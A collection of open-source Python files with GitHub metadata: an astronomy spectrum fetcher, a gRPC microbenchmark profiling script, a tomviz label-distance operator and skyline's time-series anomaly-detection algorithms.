    data_point = collections.namedtuple('DataPoint', ['x', 'y'])
    # For WUPPE, this defines the x-axis and y-axis units as a string.
    wuppe_xunit = "Angstroms"
    wuppe_yunit = "ergs/cm^2/s/Angstrom"
    # Initiate a request from Randy's perl script service. Note the return is
    # a 3-element list, each element itself is a list containing another list.
    return_request = requests.get("https://archive.stsci.edu/cgi-bin/mast_plot"
                                  ".pl?WUPPE=" + obsid.lower())
    if return_request.status_code == 500:
        # If an HTTP 500 error is returned, catch it here, since it can't
        # be converted to a JSON string using the built-in json().
        errcode = 1
        return_dataseries = DataSeries('wuppe', obsid, [], [], [], [], errcode)
    else:
        return_request = return_request.json()
        if not return_request[0]:
            # File not found by service.
            errcode = 2
            return_dataseries = DataSeries('wuppe', obsid, [], [], [], [],
                                           errcode)
        else:
            # Wavelengths are the first list in the returned 3-element list.
            wls = [float(x) for x in return_request[0][0]]
            # Fluxes are the second list in the returned 3-element list.
            fls = [float("{0:.8e}".format(x)) for x in return_request[1][0]]
            # This error code will be used unless there's a problem reading any
            # of the FITS files in the list.
            errcode = 0
            # Make sure wavelengths and fluxes are not empty and are same size.
            if wls and fls and len(wls) == len(fls):
                # Make sure wavelengths and fluxes are sorted
                # from smallest wavelength to largest.
                sort_indexes = [x[0] for x in sorted(enumerate(wls),
                                                     key=itemgetter(1))]
                wls = [wls[x] for x in sort_indexes]
                fls = [fls[x] for x in sort_indexes]
                # Zip the wavelengths and fluxes into tuples to create the plot
                # series.
                plot_series = [[data_point(x=x, y=y) for x, y in zip(wls, fls)]]
                # Create the return DataSeries object.
                return_dataseries = DataSeries('wuppe', obsid, plot_series,
                                               ['WUPPE_' + obsid],
                                               [wuppe_xunit], [wuppe_yunit],
                                               errcode)
            elif not wls or not fls:
                errcode = 3
                return_dataseries = DataSeries('wuppe', obsid, [], [], [], [],
                                               errcode)
            else:
                errcode = 4
                return_dataseries = DataSeries('wuppe', obsid, [], [], [], [],
                                               errcode)
    # Return the DataSeries object back to the calling module.
    return return_dataseries
#--------------------
| {
"content_hash": "1083c39bfb69aa4f3d5368075add1386",
"timestamp": "",
"source": "github",
"line_count": 100,
"max_line_length": 80,
"avg_line_length": 39.54,
"alnum_prop": 0.5424886191198786,
"repo_name": "openSAIL/MASTDataDelivery",
"id": "5f20a6a65cfe3e7121ec5d1e71272572f16dbeab",
"size": "3954",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "mpl_get_data_wuppe.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Java",
"bytes": "3204"
},
{
"name": "Python",
"bytes": "189906"
}
],
"symlink_target": ""
} |
import argparse
import cgi
import html
import multiprocessing
import os
import subprocess
import sys

import python_utils.jobset as jobset
import python_utils.start_port_server as start_port_server
sys.path.append(
os.path.join(os.path.dirname(sys.argv[0]), '..', 'profiling',
'microbenchmarks', 'bm_diff'))
import bm_constants
# Location of a FlameGraph checkout in the user's home directory.
flamegraph_dir = os.path.join(os.path.expanduser('~'), 'FlameGraph')
# Run from the repository root so the relative tool paths below resolve.
os.chdir(os.path.join(os.path.dirname(sys.argv[0]), '../..'))
if not os.path.exists('reports'):
    os.makedirs('reports')
start_port_server.start_port_server()
def fnize(s):
    """Sanitize a benchmark name into a filesystem-friendly token.

    Each character from the set '<>, /' becomes an underscore, and runs of
    consecutive underscores produced this way are collapsed to one.
    """
    pieces = []
    for ch in s:
        if ch in '<>, /':
            # Collapse consecutive separators into a single underscore.
            if pieces and pieces[-1] == '_':
                continue
            pieces.append('_')
        else:
            pieces.append(ch)
    return ''.join(pieces)
# index html
# Accumulated HTML for reports/index.html; the helpers below append to it
# and the final try/finally at the bottom of the script writes it out.
index_html = """
<html>
<head>
<title>Microbenchmark Results</title>
</head>
<body>
"""


def heading(name):
    """Append an <h1> section heading to the global report index page."""
    global index_html
    index_html += "<h1>%s</h1>\n" % name
def link(txt, tgt):
    """Append a hyperlink to *tgt* labeled *txt* to the report index page."""
    global index_html
    # html.escape replaces cgi.escape, which was removed in Python 3.8;
    # quote=False matches cgi.escape's default for the link text.
    index_html += "<p><a href=\"%s\">%s</a></p>\n" % (html.escape(
        tgt, quote=True), html.escape(txt, quote=False))
def text(txt):
    """Append a preformatted text section to the report index page."""
    global index_html
    # html.escape replaces cgi.escape, which was removed in Python 3.8;
    # quote=False matches cgi.escape's default behavior.
    index_html += "<p><pre>%s</pre></p>\n" % html.escape(txt, quote=False)
def collect_latency(bm_name, args):
    """Generate latency profiles for every test in the named benchmark binary.

    Builds the binary under CONFIG=basicprof, runs each test with latency
    tracing enabled, post-processes each trace into reports/<test>.txt, and
    links every report from the global index page. Jobs are flushed in
    batches to bound memory usage.
    """
    benchmarks = []
    profile_analysis = []
    cleanup = []
    heading('Latency Profiles: %s' % bm_name)
    subprocess.check_call([
        'make', bm_name, 'CONFIG=basicprof', '-j',
        '%d' % multiprocessing.cpu_count()
    ])
    for line in subprocess.check_output(
        ['bins/basicprof/%s' % bm_name, '--benchmark_list_tests']).splitlines():
        link(line, '%s.txt' % fnize(line))
        benchmarks.append(
            jobset.JobSpec([
                'bins/basicprof/%s' % bm_name,
                '--benchmark_filter=^%s$' % line, '--benchmark_min_time=0.05'
            ],
                           environ={
                               'GRPC_LATENCY_TRACE': '%s.trace' % fnize(line)
                           },
                           shortname='profile-%s' % fnize(line)))
        profile_analysis.append(
            jobset.JobSpec([
                sys.executable,
                'tools/profiling/latency_profile/profile_analyzer.py',
                '--source',
                '%s.trace' % fnize(line), '--fmt', 'simple', '--out',
                'reports/%s.txt' % fnize(line)
            ],
                           timeout_seconds=20 * 60,
                           shortname='analyze-%s' % fnize(line)))
        cleanup.append(jobset.JobSpec(['rm', '%s.trace' % fnize(line)]))
        # periodically flush out the list of jobs: profile_analysis jobs at least
        # consume upwards of five gigabytes of ram in some cases, and so analysing
        # hundreds of them at once is impractical -- but we want at least some
        # concurrency or the work takes too long
        if len(benchmarks) >= min(16, multiprocessing.cpu_count()):
            # run up to half the cpu count: each benchmark can use up to two cores
            # (one for the microbenchmark, one for the data flush)
            jobset.run(benchmarks,
                       maxjobs=max(1,
                                   multiprocessing.cpu_count() / 2))
            jobset.run(profile_analysis, maxjobs=multiprocessing.cpu_count())
            jobset.run(cleanup, maxjobs=multiprocessing.cpu_count())
            benchmarks = []
            profile_analysis = []
            cleanup = []
    # run the remaining benchmarks that weren't flushed
    if len(benchmarks):
        jobset.run(benchmarks, maxjobs=max(1, multiprocessing.cpu_count() / 2))
        jobset.run(profile_analysis, maxjobs=multiprocessing.cpu_count())
        jobset.run(cleanup, maxjobs=multiprocessing.cpu_count())
def collect_perf(bm_name, args):
    """Generate perf-based flamegraphs for every test in the benchmark binary.

    Builds under CONFIG=mutrace, records each test with `perf record`,
    converts the recordings to SVG flamegraphs under reports/, and links
    each from the global index page. Jobs are flushed in batches because
    the intermediate perf data is large.
    """
    heading('Flamegraphs: %s' % bm_name)
    subprocess.check_call([
        'make', bm_name, 'CONFIG=mutrace', '-j',
        '%d' % multiprocessing.cpu_count()
    ])
    benchmarks = []
    profile_analysis = []
    cleanup = []
    for line in subprocess.check_output(
        ['bins/mutrace/%s' % bm_name, '--benchmark_list_tests']).splitlines():
        link(line, '%s.svg' % fnize(line))
        benchmarks.append(
            jobset.JobSpec([
                'perf', 'record', '-o',
                '%s-perf.data' % fnize(line), '-g', '-F', '997',
                'bins/mutrace/%s' % bm_name,
                '--benchmark_filter=^%s$' % line, '--benchmark_min_time=10'
            ],
                           shortname='perf-%s' % fnize(line)))
        profile_analysis.append(
            jobset.JobSpec(
                [
                    'tools/run_tests/performance/process_local_perf_flamegraphs.sh'
                ],
                environ={
                    'PERF_BASE_NAME': fnize(line),
                    'OUTPUT_DIR': 'reports',
                    'OUTPUT_FILENAME': fnize(line),
                },
                shortname='flame-%s' % fnize(line)))
        cleanup.append(jobset.JobSpec(['rm', '%s-perf.data' % fnize(line)]))
        cleanup.append(jobset.JobSpec(['rm', '%s-out.perf' % fnize(line)]))
        # periodically flush out the list of jobs: temporary space required for this
        # processing is large
        if len(benchmarks) >= 20:
            # run up to half the cpu count: each benchmark can use up to two cores
            # (one for the microbenchmark, one for the data flush)
            jobset.run(benchmarks, maxjobs=1)
            jobset.run(profile_analysis, maxjobs=multiprocessing.cpu_count())
            jobset.run(cleanup, maxjobs=multiprocessing.cpu_count())
            benchmarks = []
            profile_analysis = []
            cleanup = []
    # run the remaining benchmarks that weren't flushed
    if len(benchmarks):
        jobset.run(benchmarks, maxjobs=1)
        jobset.run(profile_analysis, maxjobs=multiprocessing.cpu_count())
        jobset.run(cleanup, maxjobs=multiprocessing.cpu_count())
def run_summary(bm_name, cfg, base_json_name):
    """Build and run one benchmark binary under *cfg*, returning its stdout.

    Writes benchmark JSON output to '<base_json_name>.<cfg>.json'.
    NOTE: reads the module-level 'args' namespace for --summary_time
    rather than receiving it as a parameter.
    """
    subprocess.check_call([
        'make', bm_name,
        'CONFIG=%s' % cfg, '-j',
        '%d' % multiprocessing.cpu_count()
    ])
    cmd = [
        'bins/%s/%s' % (cfg, bm_name),
        '--benchmark_out=%s.%s.json' % (base_json_name, cfg),
        '--benchmark_out_format=json'
    ]
    if args.summary_time is not None:
        cmd += ['--benchmark_min_time=%d' % args.summary_time]
    return subprocess.check_output(cmd)
def collect_summary(bm_name, args):
    """Run the benchmark in opt and counters configs; embed summaries in the report.

    With --bigquery_upload, additionally converts the JSON output to CSV and
    loads it into the microbenchmarks BigQuery table via the 'bq' CLI.
    """
    heading('Summary: %s [no counters]' % bm_name)
    text(run_summary(bm_name, 'opt', bm_name))
    heading('Summary: %s [with counters]' % bm_name)
    text(run_summary(bm_name, 'counters', bm_name))
    if args.bigquery_upload:
        with open('%s.csv' % bm_name, 'w') as f:
            f.write(
                subprocess.check_output([
                    'tools/profiling/microbenchmarks/bm2bq.py',
                    '%s.counters.json' % bm_name,
                    '%s.opt.json' % bm_name
                ]))
        subprocess.check_call([
            'bq', 'load', 'microbenchmarks.microbenchmarks',
            '%s.csv' % bm_name
        ])
# Map collector names to their implementations; -c/--collect selects these.
collectors = {
    'latency': collect_latency,
    'perf': collect_perf,
    'summary': collect_summary,
}
argp = argparse.ArgumentParser(description='Collect data from microbenchmarks')
argp.add_argument('-c',
                  '--collect',
                  choices=sorted(collectors.keys()),
                  nargs='*',
                  default=sorted(collectors.keys()),
                  help='Which collectors should be run against each benchmark')
argp.add_argument('-b',
                  '--benchmarks',
                  choices=bm_constants._AVAILABLE_BENCHMARK_TESTS,
                  default=bm_constants._AVAILABLE_BENCHMARK_TESTS,
                  nargs='+',
                  type=str,
                  help='Which microbenchmarks should be run')
argp.add_argument('--bigquery_upload',
                  default=False,
                  action='store_const',
                  const=True,
                  help='Upload results from summary collection to bigquery')
argp.add_argument(
    '--summary_time',
    default=None,
    type=int,
    help='Minimum time to run benchmarks for the summary collection')
args = argp.parse_args()
try:
    for collect in args.collect:
        for bm_name in args.benchmarks:
            collectors[collect](bm_name, args)
finally:
    # Always write the (possibly partial) index so that a failed run still
    # leaves a browsable report behind.
    if not os.path.exists('reports'):
        os.makedirs('reports')
    index_html += "</body>\n</html>\n"
    with open('reports/index.html', 'w') as f:
        f.write(index_html)
| {
"content_hash": "1e2272c32b218d0ba7136da69619af3a",
"timestamp": "",
"source": "github",
"line_count": 246,
"max_line_length": 84,
"avg_line_length": 35.32113821138211,
"alnum_prop": 0.5509264587409368,
"repo_name": "firebase/grpc",
"id": "4b9cd4bc8e85661f9a9cfeefbcc310b227710f5d",
"size": "9289",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "tools/run_tests/run_microbenchmark.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "Awk",
"bytes": "5444"
},
{
"name": "Batchfile",
"bytes": "35774"
},
{
"name": "C",
"bytes": "3708933"
},
{
"name": "C#",
"bytes": "2162951"
},
{
"name": "C++",
"bytes": "12275592"
},
{
"name": "CMake",
"bytes": "495117"
},
{
"name": "CSS",
"bytes": "1519"
},
{
"name": "DTrace",
"bytes": "147"
},
{
"name": "Dockerfile",
"bytes": "169468"
},
{
"name": "Go",
"bytes": "34794"
},
{
"name": "HTML",
"bytes": "14"
},
{
"name": "Java",
"bytes": "6259"
},
{
"name": "JavaScript",
"bytes": "84355"
},
{
"name": "M4",
"bytes": "69163"
},
{
"name": "Makefile",
"bytes": "1104867"
},
{
"name": "Mako",
"bytes": "5629"
},
{
"name": "Objective-C",
"bytes": "696194"
},
{
"name": "Objective-C++",
"bytes": "77574"
},
{
"name": "PHP",
"bytes": "392133"
},
{
"name": "PowerShell",
"bytes": "3226"
},
{
"name": "Python",
"bytes": "3401091"
},
{
"name": "Ruby",
"bytes": "982979"
},
{
"name": "Shell",
"bytes": "532295"
},
{
"name": "Starlark",
"bytes": "554304"
},
{
"name": "Swift",
"bytes": "3516"
},
{
"name": "TSQL",
"bytes": "4901"
},
{
"name": "XSLT",
"bytes": "9846"
}
],
"symlink_target": ""
} |
import tomviz.operators
class LabelObjectDistanceFromPrincipalAxis(tomviz.operators.CancelableOperator):
    # Cancelable tomviz operator: the progress callbacks below return
    # self.canceled so the helper routines can abort mid-computation.
    def transform_scalars(self, dataset, label_value=1, principal_axis=0):
        """Computes the distance from the centroid of each connected component
        in the label object with the given label_value to the given principal
        axis and store that distance in each voxel of the label object connected
        component. A principal_axis of 0 is first principal axis, 1 is the
        second, and 2 is third.

        :param dataset: VTK dataset carrying 'PrincipalAxes' (3 tuples x 3
            components) and 'Center' (1 tuple x 3 components) field-data
            arrays, validated by the asserts below.
        :param label_value: voxel label to keep; all other voxels are zeroed.
        :param principal_axis: index in [0, 2] selecting the axis to measure
            distances from.
        """
        import numpy as np
        from tomviz import itkutils
        from tomviz import utils
        self.progress.maximum = 100
        self.progress.value = 0
        # Cumulative progress milestones for the four phases: blanking,
        # connected components, shape attributes, distance fill.
        STEP_PCT = [20, 60, 80, 100]
        fd = dataset.GetFieldData()
        axis_array = fd.GetArray('PrincipalAxes')
        assert axis_array is not None, \
            "Dataset does not have a PrincipalAxes field data array"
        assert axis_array.GetNumberOfTuples() == 3, \
            "PrincipalAxes array requires 3 tuples"
        assert axis_array.GetNumberOfComponents() == 3, \
            "PrincipalAxes array requires 3 components"
        assert principal_axis >= 0 and principal_axis <= 2, \
            "Invalid principal axis. Must be in range [0, 2]."
        axis = np.array(axis_array.GetTuple(principal_axis))
        center_array = fd.GetArray('Center')
        assert center_array is not None, \
            "Dataset does not have a Center field data array"
        assert center_array.GetNumberOfTuples() == 1, \
            "Center array requires 1 tuple"
        assert center_array.GetNumberOfComponents() == 3, \
            "Center array requires 3 components"
        center = np.array(center_array.GetTuple(0))
        # Blank out the undesired label values
        scalars = utils.get_scalars(dataset)
        scalars[scalars != label_value] = 0
        utils.set_scalars(dataset, scalars)
        self.progress.value = STEP_PCT[0]
        # Get connected components of voxels labeled by label value
        def connected_progress_func(fraction):
            # Map helper progress [0, 1] into the [STEP_PCT[0], STEP_PCT[1]] band.
            self.progress.value = \
                int(fraction * (STEP_PCT[1] - STEP_PCT[0]) + STEP_PCT[0])
            return self.canceled
        utils.connected_components(dataset, 0, connected_progress_func)
        # Get shape attributes
        def label_progress_func(fraction):
            # Map helper progress [0, 1] into the [STEP_PCT[1], STEP_PCT[2]] band.
            self.progress.value = \
                int(fraction * (STEP_PCT[2] - STEP_PCT[1]) + STEP_PCT[1])
            return self.canceled
        shape_label_map = \
            itkutils.get_label_object_attributes(dataset, label_progress_func)
        num_label_objects = shape_label_map.GetNumberOfLabelObjects()
        # Map from label value to distance from principal axis. Used later to
        # fill in distance array.
        labels = utils.get_scalars(dataset)
        max_label = np.max(labels)
        label_value_to_distance = [0 for i in range(max_label + 1)]
        for i in range(0, num_label_objects):
            label_object = shape_label_map.GetNthLabelObject(i)
            # Flip the centroid. I have verified that the x and z coordinates
            # of the centroid coming out of the shape label objects are swapped,
            # so I reverse it here.
            centroid = np.flipud(np.array(label_object.GetCentroid()))
            v = center - centroid
            # Distance from the axis line through `center`: remove the
            # projection of v onto the axis (assumed unit length -- TODO
            # confirm upstream normalization) and take the norm of the rest.
            dot = np.dot(v, axis)
            d = np.linalg.norm(v - dot*axis)
            label_value_to_distance[label_object.GetLabel()] = d
        distance = np.zeros(dataset.GetNumberOfPoints())
        # Assumes `labels` iterates in the same point order as the dataset's
        # points -- presumably guaranteed by utils.get_scalars; verify there.
        for i in range(len(labels)):
            distance[i] = label_value_to_distance[labels[i]]
        self.progress.value = STEP_PCT[3]
        import vtk.util.numpy_support as np_s
        distance_array = np_s.numpy_to_vtk(distance, deep=1)
        distance_array.SetName('Distance')
        dataset.GetPointData().SetScalars(distance_array)
| {
"content_hash": "0b585aec869d2855f3cbac707fd67ec0",
"timestamp": "",
"source": "github",
"line_count": 95,
"max_line_length": 80,
"avg_line_length": 41.410526315789475,
"alnum_prop": 0.6263345195729537,
"repo_name": "mathturtle/tomviz",
"id": "f808de794a00368fdae049e047a1bc7067ac0ac4",
"size": "3934",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "tomviz/python/LabelObjectDistanceFromPrincipalAxis.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C++",
"bytes": "1606132"
},
{
"name": "CMake",
"bytes": "40072"
},
{
"name": "Python",
"bytes": "315727"
},
{
"name": "Shell",
"bytes": "1816"
}
],
"symlink_target": ""
} |
import pandas
import numpy as np
import scipy
import statsmodels.api as sm
import traceback
import logging
from time import time
from msgpack import unpackb, packb
from redis import StrictRedis
from settings import (
ALGORITHMS,
CONSENSUS,
FULL_DURATION,
MAX_TOLERABLE_BOREDOM,
MIN_TOLERABLE_LENGTH,
STALE_PERIOD,
REDIS_SOCKET_PATH,
ENABLE_SECOND_ORDER,
BOREDOM_SET_SIZE,
)
from algorithm_exceptions import *
# Module-level logger shared by all algorithm functions in this file.
logger = logging.getLogger("AnalyzerLog")
# Redis connection over a unix socket; used by is_anomalously_anomalous
# to persist per-metric trigger history.
redis_conn = StrictRedis(unix_socket_path=REDIS_SOCKET_PATH)
"""
This is no man's land. Do anything you want in here,
as long as you return a boolean that determines whether the input
timeseries is anomalous or not.
To add an algorithm, define it here, and add its name to settings.ALGORITHMS.
"""
def two_exp_moving_average(timeseries):
    """
    A timeseries is anomalous if the absolute value of the short-term
    (com=21) exponentially weighted moving average exceeds that of the
    long-term (com=55) one at the latest datapoint.

    Returns True when anomalous; otherwise falls through and returns None
    implicitly (matching the other algorithms here -- run_selected_algorithm
    counts explicit False values only, so do not change None to False).
    """
    series = pandas.Series([x[1] for x in timeseries])
    # pandas.stats.moments.ewma and Series.iget were removed from pandas;
    # Series.ewm(...).mean() and .iloc[-1] are the modern equivalents.
    t1 = series.ewm(com=21).mean()
    t2 = series.ewm(com=55).mean()
    if abs(t1.iloc[-1]) > abs(t2.iloc[-1]):
        return True
def two_moving_average(timeseries):
    """
    A timeseries is anomalous if the absolute value of the short-term
    (21-point) simple moving average exceeds that of the long-term
    (55-point) one at the latest datapoint.

    Returns True when anomalous; otherwise falls through and returns None
    implicitly (matching the other algorithms here -- run_selected_algorithm
    counts explicit False values only, so do not change None to False).
    """
    series = pandas.Series([x[1] for x in timeseries])
    # pandas.rolling_mean and Series.iget were removed from pandas;
    # Series.rolling(...).mean() and .iloc[-1] are the modern equivalents
    # (same default min_periods == window, so NaN behavior is unchanged).
    t1 = series.rolling(21).mean()
    t2 = series.rolling(55).mean()
    if abs(t1.iloc[-1]) > abs(t2.iloc[-1]):
        return True
def MACD(timeseries):
    """
    A timeseries is anomalous if the MACD line (12-period EWMA minus
    26-period EWMA) is more than twice the magnitude of its signal line
    (9-period EWMA of the MACD line) at the latest datapoint.

    Returns True when anomalous; otherwise falls through and returns None
    implicitly (matching the other algorithms here).
    """
    series = pandas.Series([x[1] for x in timeseries])
    # pandas.stats.moments.ewma and Series.iget were removed from pandas;
    # Series.ewm(...).mean() and .iloc[-1] are the modern equivalents.
    t1 = series.ewm(com=12).mean()
    t2 = series.ewm(com=26).mean()
    t3 = t1 - t2
    t4 = t3.ewm(com=9).mean()
    if abs(t3.iloc[-1]) > 2 * abs(t4.iloc[-1]):
        return True
def tail_avg(timeseries):
    """
    Average of the last three datapoint values, used as a noise-reduced
    stand-in for the latest datapoint. Reduces sensitivity and adds a small
    detection delay in exchange. Falls back to the last value alone when the
    series holds fewer than three points.
    """
    try:
        last_three = timeseries[-1][1] + timeseries[-2][1] + timeseries[-3][1]
        return last_three / 3
    except IndexError:
        # Fewer than three datapoints: use the latest one as-is.
        return timeseries[-1][1]
def median_absolute_deviation(timeseries):
    """
    A timeseries is anomalous if the deviation of its latest datapoint with
    respect to the median is X times larger than the median of deviations.

    Returns True when anomalous, False when the deviation statistic is
    degenerate, and None (implicitly) otherwise.
    """
    series = pandas.Series([x[1] for x in timeseries])
    median = series.median()
    demedianed = np.abs(series - median)
    median_deviation = demedianed.median()
    # The test statistic is infinite when the median is zero,
    # so it becomes super sensitive. We play it safe and skip when this happens.
    if median_deviation == 0:
        return False
    # Series.iget was removed from pandas; .iloc is the modern equivalent.
    test_statistic = demedianed.iloc[-1] / median_deviation
    # Completely arbitrary... triggers if the latest deviation is
    # 6 times bigger than the median deviation.
    if test_statistic > 6:
        return True
def grubbs(timeseries):
    """
    A timeseries is anomalous if the Z score of the tail average is greater
    than the Grubbs' score for the series length at alpha = 0.05.

    Returns a (numpy) boolean.
    """
    # scipy.array and scipy.std were deprecated numpy aliases removed from
    # SciPy; use numpy directly (np.std keeps the same ddof=0 default).
    series = np.asarray([x[1] for x in timeseries])
    stdDev = np.std(series)
    mean = np.mean(series)
    tail_average = tail_avg(timeseries)
    z_score = (tail_average - mean) / stdDev
    len_series = len(series)
    # Two-sided critical value of Student's t for the Grubbs test.
    threshold = scipy.stats.t.isf(.05 / (2 * len_series), len_series - 2)
    threshold_squared = threshold * threshold
    grubbs_score = ((len_series - 1) / np.sqrt(len_series)) * np.sqrt(threshold_squared / (len_series - 2 + threshold_squared))
    return z_score > grubbs_score
def first_hour_average(timeseries):
    """
    Calculate the simple average over the one-hour window that began
    FULL_DURATION seconds ago. A timeseries is anomalous if the average of
    the last three datapoints lies outside three standard deviations of
    that baseline.
    """
    last_hour_threshold = time() - (FULL_DURATION - 3600)
    early_values = [point[1] for point in timeseries if point[0] < last_hour_threshold]
    series = pandas.Series(early_values)
    baseline_mean = series.mean()
    baseline_std = series.std()
    tail = tail_avg(timeseries)
    return abs(tail - baseline_mean) > 3 * baseline_std
def stddev_from_average(timeseries):
    """
    A timeseries is anomalous if the absolute difference between the
    average of the latest three datapoints and the mean of the whole series
    exceeds three standard deviations of the series. No exponential
    weighting is applied, so this detects anomalies relative to the entire
    series rather than short-term trends.
    """
    values = pandas.Series([point[1] for point in timeseries])
    overall_mean = values.mean()
    overall_std = values.std()
    tail = tail_avg(timeseries)
    return abs(tail - overall_mean) > 3 * overall_std
def stddev_from_moving_average(timeseries):
    """
    A timeseries is anomalous if the absolute difference between the latest
    datapoint and the exponentially weighted moving average (com=50) is
    greater than three exponentially weighted moving standard deviations.
    Better for finding anomalies with respect to short-term trends.

    Returns a (numpy) boolean.
    """
    series = pandas.Series([x[1] for x in timeseries])
    # pandas.stats.moments.ewma/ewmstd and Series.iget were removed from
    # pandas; Series.ewm(...).mean()/.std() and .iloc[-1] are the modern
    # equivalents (same adjust=True / bias=False defaults).
    expAverage = series.ewm(com=50).mean()
    stdDev = series.ewm(com=50).std()
    return abs(series.iloc[-1] - expAverage.iloc[-1]) > 3 * stdDev.iloc[-1]
def mean_subtraction_cumulation(timeseries):
    """
    A timeseries is anomalous if the value of the next datapoint in the
    series is farther than three standard deviations out (in cumulative
    terms) after subtracting the mean of all prior datapoints.

    Returns a (numpy) boolean. Missing/zero values are coerced to 0.
    """
    series = pandas.Series([x[1] if x[1] else 0 for x in timeseries])
    series = series - series[0:len(series) - 1].mean()
    stdDev = series[0:len(series) - 1].std()
    # The original also computed an exponentially weighted moving average
    # here (pandas.stats.moments.ewma, an API since removed from pandas)
    # but never used it; the dead call is dropped. Series.iget was likewise
    # removed in favor of .iloc.
    return abs(series.iloc[-1]) > 3 * stdDev
def least_squares(timeseries):
    """
    A timeseries is anomalous if the average of the last three residuals
    against a least-squares line fit is greater than three sigma of the
    residuals (and both round to nonzero).

    Returns False for series with fewer than three datapoints.
    """
    x = np.array([t[0] for t in timeseries])
    y = np.array([t[1] for t in timeseries])
    A = np.vstack([x, np.ones(len(x))]).T
    # Solve the normal equations once; the original solved them twice and
    # discarded the residual from the first call. rcond=None selects the
    # modern (non-deprecated) cutoff for small singular values.
    m, c = np.linalg.lstsq(A, y, rcond=None)[0]
    # Residuals of each datapoint against the fitted line.
    errors = [value - (m * x[i] + c) for i, value in enumerate(y)]
    if len(errors) < 3:
        return False
    # scipy.std was a deprecated alias removed from SciPy; np.std is the
    # same computation (ddof=0).
    std_dev = np.std(errors)
    t = (errors[-1] + errors[-2] + errors[-3]) / 3
    return abs(t) > std_dev * 3 and round(std_dev) != 0 and round(t) != 0
def histogram_bins(timeseries):
    """
    A timeseries is anomalous if the average of the last three datapoints
    falls into a histogram bin with less than 20 other datapoints (you'll
    need to tweak that number depending on your data).

    Returns True when the tail average lands in a sparse bin, False
    otherwise.
    """
    # scipy.array was a deprecated numpy alias removed from SciPy; use
    # numpy directly.
    series = np.asarray([x[1] for x in timeseries])
    t = tail_avg(timeseries)
    h = np.histogram(series, bins=15)
    bins = h[1]
    for index, bin_size in enumerate(h[0]):
        if bin_size <= 20:
            # Is it in the first bin?
            if index == 0:
                if t <= bins[0]:
                    return True
            # Is it in the current bin?
            elif t >= bins[index] and t < bins[index + 1]:
                return True
    return False
def ks_test(timeseries):
    """
    A timeseries is anomalous if a 2-sample Kolmogorov-Smirnov test
    indicates that the data distribution for the last 10 minutes differs
    from the last hour. It produces false positives on non-stationary
    series, so an Augmented Dickey-Fuller test is applied to check for
    stationarity before surfacing the anomaly.
    """
    hour_ago = time() - 3600
    ten_minutes_ago = time() - 600
    # scipy.array was a deprecated numpy alias removed from SciPy; use
    # numpy directly.
    reference = np.asarray([x[1] for x in timeseries if x[0] >= hour_ago and x[0] < ten_minutes_ago])
    probe = np.asarray([x[1] for x in timeseries if x[0] >= ten_minutes_ago])
    # Both windows need a minimum sample size for the test to mean much.
    if reference.size < 20 or probe.size < 20:
        return False
    ks_d, ks_p_value = scipy.stats.ks_2samp(reference, probe)
    if ks_p_value < 0.05 and ks_d > 0.5:
        # Distributions differ; confirm the reference window is stationary
        # before trusting the result.
        adf = sm.tsa.stattools.adfuller(reference, 10)
        if adf[1] < 0.05:
            return True
    return False
def is_anomalously_anomalous(metric_name, ensemble, datapoint):
    """
    This method runs a meta-analysis on the metric to determine whether the
    metric has a past history of triggering. TODO: weight intervals based on datapoint

    Side effects: reads and writes 'trigger_history.<metric_name>' in redis
    (msgpack-encoded list of [timestamp, datapoint] pairs). Returns True
    when this trigger should be surfaced.
    """
    # We want the datapoint to avoid triggering twice on the same data
    new_trigger = [time(), datapoint]
    # Get the old history
    raw_trigger_history = redis_conn.get('trigger_history.' + metric_name)
    if not raw_trigger_history:
        # First trigger ever for this metric: seed the history and surface it.
        redis_conn.set('trigger_history.' + metric_name, packb([(time(), datapoint)]))
        return True
    trigger_history = unpackb(raw_trigger_history)
    # Are we (probably) triggering on the same data?
    if (new_trigger[1] == trigger_history[-1][1] and
        new_trigger[0] - trigger_history[-1][0] <= 300):
        return False
    # Update the history
    trigger_history.append(new_trigger)
    redis_conn.set('trigger_history.' + metric_name, packb(trigger_history))
    # Should we surface the anomaly?
    # Gaps (seconds) between consecutive triggers; the anomaly is surfaced
    # only when the latest gap is itself unusual versus the metric's
    # historical trigger cadence.
    trigger_times = [x[0] for x in trigger_history]
    intervals = [
        trigger_times[i + 1] - trigger_times[i]
        for i, v in enumerate(trigger_times)
        if (i + 1) < len(trigger_times)
    ]
    series = pandas.Series(intervals)
    mean = series.mean()
    stdDev = series.std()
    return abs(intervals[-1] - mean) > 3 * stdDev
def run_selected_algorithm(timeseries, metric_name):
    """
    Filter the timeseries (short / stale / boring series raise TooShort,
    Stale and Boring respectively), then run every algorithm named in
    settings.ALGORITHMS and apply the CONSENSUS rule.

    Returns (anomalous, ensemble, latest_datapoint). On any algorithm
    failure, logs the traceback and returns (False, [], 1).
    """
    # Get rid of short series
    if len(timeseries) < MIN_TOLERABLE_LENGTH:
        raise TooShort()
    # Get rid of stale series
    if time() - timeseries[-1][0] > STALE_PERIOD:
        raise Stale()
    # Get rid of boring series
    if len(set(item[1] for item in timeseries[-MAX_TOLERABLE_BOREDOM:])) == BOREDOM_SET_SIZE:
        raise Boring()
    try:
        # Look each algorithm up by name in this module's namespace.
        ensemble = [globals()[algorithm](timeseries) for algorithm in ALGORITHMS]
        # Anomalous unless more than (len - CONSENSUS) algorithms returned
        # an explicit False (implicit None returns are not counted).
        threshold = len(ensemble) - CONSENSUS
        if ensemble.count(False) <= threshold:
            if ENABLE_SECOND_ORDER:
                if is_anomalously_anomalous(metric_name, ensemble, timeseries[-1][1]):
                    return True, ensemble, timeseries[-1][1]
            else:
                return True, ensemble, timeseries[-1][1]
        return False, ensemble, timeseries[-1][1]
    except Exception:
        # Catch Exception rather than a bare except so SystemExit and
        # KeyboardInterrupt still propagate, and log through the module's
        # "AnalyzerLog" logger instead of the root logger (the original
        # called logging.error, inconsistent with `logger` above).
        logger.error("Algorithm error: " + traceback.format_exc())
        return False, [], 1
| {
"content_hash": "7f32df71c06c84c6aee7a28803908f17",
"timestamp": "",
"source": "github",
"line_count": 337,
"max_line_length": 127,
"avg_line_length": 31.49258160237389,
"alnum_prop": 0.6492980307170452,
"repo_name": "neo900/skyline",
